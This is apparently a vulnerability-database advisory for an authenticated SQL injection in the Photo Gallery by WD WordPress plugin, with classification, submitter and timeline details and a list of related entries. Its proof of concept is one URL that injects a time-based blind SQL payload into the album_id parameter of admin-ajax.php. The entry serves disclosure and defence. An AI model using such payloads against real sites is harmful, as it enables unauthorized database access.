Photo Gallery by WD <= 1.3.35 – Authenticated SQL Injection

Description

http://www.defensecode.com/advisories/DC-2017-02-011_WordPress_WebDorado_Gallery_Plugin_Advisory.pdf

Proof of Concept

http://www.vulnerablesite.com/wp-admin/admin-ajax.php?action=addAlbumsGalleries&album_id=0%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))VvZV)&width=700&height=550&bwg_items_per_page=20&bwg_nonce=b939983df9&TB_iframe=1

Affects Plugins

photo-gallery

Fixed in 1.3.36

References

URL

https://www.defensecode.com/advisories/DC-2017-02-011_WordPress_WebDorado_Gallery_Plugin_Advisory.pdf

Classification

Type

SQLI

OWASP top 10

A1: Injection

CWE

CWE-89

Miscellaneous

Submitter

Neven Biruski

Submitter website

http://www.defensecode.com

Submitter twitter

DefenseCode

Verified

Yes

WPVDB ID

7ee790bd-84fb-4625-a308-da5d50677589

Timeline

Publicly Published

2017-05-02 (about 9 years ago)

Added

2017-05-05 (about 9 years ago)

Last Updated

2019-11-01 (about 6 years ago)

Other

Published

Title

Published

2014-08-01

Title

SCORM Cloud < 1.0.7 - SQL Injection

Published

2025-01-07

Title

WOOEXIM <= 5.0.0 - Authenticated (Administrator+) SQL Injection

Published

2022-11-07

Title

WP User Merger < 1.5.3 - Admin+ SQLi via ID

Published

2014-08-01

Title

Media Library Categories <= 1.0.6 - SQL Injection

Published

2024-05-23

Title

Search & Replace < 3.2.2 - Admin+ SQL injection